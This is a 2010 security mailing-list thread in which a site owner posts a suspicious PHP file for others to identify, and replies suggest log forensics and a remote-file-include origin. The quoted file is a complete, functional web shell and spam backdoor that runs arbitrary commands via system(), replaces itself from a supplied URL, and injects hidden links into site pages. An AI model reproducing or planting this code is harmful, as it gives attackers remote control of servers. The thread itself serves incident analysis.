PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

Odd PHP file, trying to find out what it does

From: only.samurai at gmail.com (Andrew Ellis)
Date: Mon, 1 Mar 2010 11:12:23 -0600
Historically, I've seen this stuff done through a Remote File Include,
tho I can think of a dozen other ways to get it up on your server. I'd
probably start by digging through the logs looking for someone
including this file in some URL parameter.



On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <jim.halfpenny at gmail.com> wrote:

A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum
thread with some info on this file:

http://www.webhostingtalk.com/showthread.php?t=876121

I'm sure there are other sources of info out there. Time for some forensic
analysis of your logs to work out how and when this got here. I'm guessing
an automated attack against a known vuln in a PHP app?

Jim

On 1 March 2010 09:16, Adrian Crenshaw <irongeek at irongeek.com> wrote:


Ok, I think one of my sites may have been compromised. I found the
following PHP script on a site, but I'm not sure what it is trying to do.
Anyone else ever seen this script before?

Adrian

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
??? unlink("c");
??? unlink("1r");
? unlink("log");
}

function Clear2()
{
??? $mrd = trim(file_get_contents("m"));
??? $pt = "../$mrd";
??? $fin = file_get_contents($pt);
??? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
??? $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
??? $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
??? $fin = ereg_replace("<!--dd4-->", "", $fin);
? $fin = ereg_replace("<!--dd5-->", "", $fin);
? $fin = ereg_replace("<font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">", "", $fin);
??? $fmrd = fopen($pt, "w+");
??? fwrite($fmrd, $fin);
??? fclose($fmrd);
??? echo " upt-ok";
}

function GetVar($name, &$var)
{
??? $var = "";
??? if (isset($_POST[$name]))
??? ??? $var = $_POST[$name];

? if (isset($_GET[$name]))
??? ??? $var = $_GET[$name];

??? if (($var) =="")
??? ? return? false;
??? ? else return true;
}

function Gen()
{
??? $alp = "abcdefghiklmnjsweqrtyuiopzx";
??? $maps = array();
??? if (isset($_POST["sg"]))
??? ??? $sg = $_POST["sg"];

? if (isset($_GET["sg"]))
??? ??? $sg = $_GET["sg"];

??? if (isset($_POST["gm"]))
???? ?$g = $_POST["gm"];

??? if (isset($_GET["gm"]))
??? ??? $g = $_GET["gm"];


??? $path = "";
??? $fr = fopen("1r", "a+");
??? if (file_exists("c"))
??? {
??? ??? $fconf = file("c");
??? ??? $tname = trim($fconf[0]);
??? ??? $cname = trim($fconf[1]);
??? ??? $curs = trim($fconf[2]);
??? ??? $pid = trim($fconf[3]);
??? ??? if ($pid == 100)
??? ??? {
??? ??? ??? $pid = 0;
??? ??? ??? $rnd = mt_rand(0, 999);
??? ??? ??? $nm = "";
??? ??? for ($i=0; $i<3; $i++)
??? ? ??? {
??? ??? ? ??? $ran = mt_rand(0,26);
??? ??? ? ??? $sym = $alp[$ran];
??? ??? ? ??? $nm = $nm.$sym;
??? ??? ? }
??? ??? ??? $cname = $nm;
??? ??? ??? mkdir("$tname/$cname");
??? ??? ??? $curs = $g;
??? ??? }
??? }
??? else
??? {
??? ??? $rnd = mt_rand(0, 999);
??? ??? $nm = "";
??? ? for ($i=0; $i<5; $i++)
??? ??? {
??? ??? ??? $ran = mt_rand(0,26);
??? ??? ??? $sym = $alp[$ran];
??? ??? ??? $nm = $nm.$sym;
??? ??? }
??? ??? $tname = $nm;
??? ??? $pid = 0;
??? ??? $curs = $g;
??? ??? mkdir($tname);
??? ??? $fht = fopen("$tname/.htaccess", "w+");
??? ??? $htname = $sg."2.txt";
??? ??? $fp = fopen($htname, "r");
??? ??? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
??? ??? fclose($fp);
??? ??? fwrite($fht, $fin);
??? ??? fclose($fht);
??? ??? $rnd = mt_rand(0, 999);
??? ??? $nm = "";
??? for ($i=0; $i<3; $i++)
? ??? {
??? ? ??? $ran = mt_rand(0,26);
??? ? ??? $sym = $alp[$ran];
??? ? ??? $nm = $nm.$sym;
??? ? }
??? ??? $cname = $nm;
??? mkdir("$tname/$cname");
??? }
? $gname = $sg."sgen.php";
??? for ($j=$pid; $j<$pid+10; $j++)
??? {
??? ??? $fp = fopen($gname."?g=$curs", "r");
??? ??? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
??? ??? fclose($fp);

??? ??? $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
??? ??? fwrite($fnd, $fin);
??? ??? fclose($fnd);
??? }

??? if ($j==100)
??? {
??? ? $fp = fopen($gname."?g=$curs&m=1", "r");
??? ??? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
??? ??? fclose($fp);
??? ??? $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
??? ??? fwrite($fnd, $fin);
??? ??? fclose($fnd);
??? ??? $map = "$path/$tname/$cname/$curs"."_lm.htm";
??? ??? fwrite($fr,"$map\n");
??? }

??? $fconf = fopen("c", "w+");
??? fwrite($fconf, $tname."\n");
??? fwrite($fconf, $cname."\n");
??? fwrite($fconf, $curs."\n");
??? $nj = $j;
??? fwrite($fconf, $nj."\n");
??? fclose($fconf);
}

function Update()
{
??? $thisname = "1.php";
??? if (isset($_POST['u']))
??? ? $u = $_POST['u'];

??? if (isset($_GET['u']))
???? ??? $u = $_GET['u'];

???? $fp = fopen($u, "r");
? $fin = '';
??? ??? while (!feof($fp))
??? ??? {
??? ??? ??? ?$fc = fgets($fp, 1024);
??? ??? ??? ?if (!$fc) break;
??? ??? ?? $fin .= $fc;
??? ??? }
? fclose($fp);

? $fthis = fopen($thisname, "w+");
? fwrite($fthis, $fin);
? fclose($fthis);
}

function Com()
{
??? if (isset($_POST['c']))
??? ? @system($_POST['c']);
? if (isset($_GET['c']))
??? ??? @system($_GET['c']);
}

function UpKos()
{
??? $mrd = trim(file_get_contents("m"));
??? $pt = "../$mrd";
??? $fin = file_get_contents($pt);
??? $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
??? $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
??? $fmrd = fopen($pt, "w+");
??? fwrite($fmrd, $fin);
??? fclose($fmrd);
}


function MRepl()
{
??? $mpt = "";
??? $drs = "";
??? $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">";
? $endtag = "</font></body></html><sdioyslkjs2> ";
??? $mrd = trim(file_get_contents("m"));
??? $pt = "../$mrd";
??? $fin = file_get_contents($pt);
??? GetVar("mpt", $mpt);
??? ?// ??????? ??????????? ???? ????
? $fin = preg_replace ("/<\/body>/i", "", $fin);
? $fin = preg_replace ("/<\/html>/i", "", $fin);
? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
??? $fp = fopen($mpt, "r");
? GetVar("drs", $drs);
? $fin = $fin.$begtag;
$drs = str_replace("\\", "", $drs);
? $fin = $fin.$drs;
? $fin = $fin.$endtag;
? $fmrd = fopen($pt, "w+");
??? fwrite($fmrd, $fin);
??? fclose($fmrd);
}

function Main()
{
??? if (isset($_POST['u']) || isset($_GET['u']))
??? {
??? ??? Update();
??? ??? exit();
??? }

??? if (isset($_POST['c']) || isset($_GET['c']))
??? {
??? ??? Com();
??? ??? exit();
??? }

??? ??? if (isset($_POST['uk']) || isset($_GET['uk']))
??? {
??? ??? UpKos();
??? ??? exit();
??? }

??? if (isset($_POST['g']) || isset($_GET['g']))
??? {
??? ??? Gen();
??? ??? exit();
??? }

??? if (isset($_POST['s']) || isset($_GET['s']))
??? {
??? ??? MRepl();
??? ??? exit();
??? }

? if (isset($_POST['cl']) || isset($_GET['cl']))
??? {
??? ??? Clear();
??? ??? exit();
??? }

??? if (isset($_POST['cl2']) || isset($_GET['cl2']))
??? {
??? ??? Clear2();
??? ??? exit();
??? }

??? echo "<ok>";

}

Main();

?>

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com



_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com





-- 
Andrew Ellis
http://blog.psych0tik.net
Previous By Date Next
Previous By Thread Next

Current thread: